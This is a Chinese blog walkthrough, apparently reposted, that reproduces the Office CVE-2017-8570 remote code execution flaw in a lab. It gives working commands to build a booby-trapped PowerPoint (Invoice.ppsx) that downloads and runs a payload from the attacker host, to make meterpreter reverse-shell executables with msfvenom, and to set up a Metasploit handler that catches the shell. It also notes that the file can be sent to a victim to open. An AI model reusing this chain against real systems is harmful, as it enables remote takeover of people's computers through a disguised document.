Office CVE-2017-8570远程代码执行漏洞复现

Office CVE-2017-8570远程代码执行漏洞复现

漏洞影响版本

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
复现环境:
  • 攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit
  • 目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013

1、生成恶意文件:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc
注意:

  • 1、这里的IP是攻击机IP
  • 2、Invoice.ppsx为生成的恶意文件
  • 3、这里可能会报一个错误:
    IOError: [Errno 2] No such file or directory: ‘template/template.ppsx’
    image
    这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题!
    在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改:
    image
    修改后为此文件(template.ppsx)所在路径:
    如我现在的文件为/root/Office8570-master/文件夹下,所以修改成:

image
接下来执行第一步生成恶意文件命令就不会报错了!
image
生成的恶意文件:
image


2、生成反弹shell文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe
设置反弹shell的ip192.168.1.194,和监听端口6666
命令执行成功:
image
生成的shell文件
image
当然了,如果目标机是64位机器那么需要执行不一样的命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe
命令执行成功
image
生成shell64文件
image


### 3、监听会话(来自ppsx执行反弹shell)

执行命令(32位目标机):
python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe
过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马
命令执行成功监听服务启动:
image
接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell:
msfconsole
image

msf > use exploit/multi/handler
image
msf > set LHOST 192.168.1.194
image
msf > set LPORT 6666
image
msf > set PAYLOAD windows/meterpreter/reverse_tcp
image
msf > exploit
image

同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行):
msf > set pauload windows/x64/meterpreter/reverse_tcp


### 4、漏洞执行

最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。
image
文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T)
image
Shell反弹显示get到了目标机
image
然后再meterpreter中可以直接执行ls命令,如下:
image
可见win7桌面上的文件:
我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了:
image



猜你喜欢

转载自blog.csdn.net/u011215939/article/details/78838841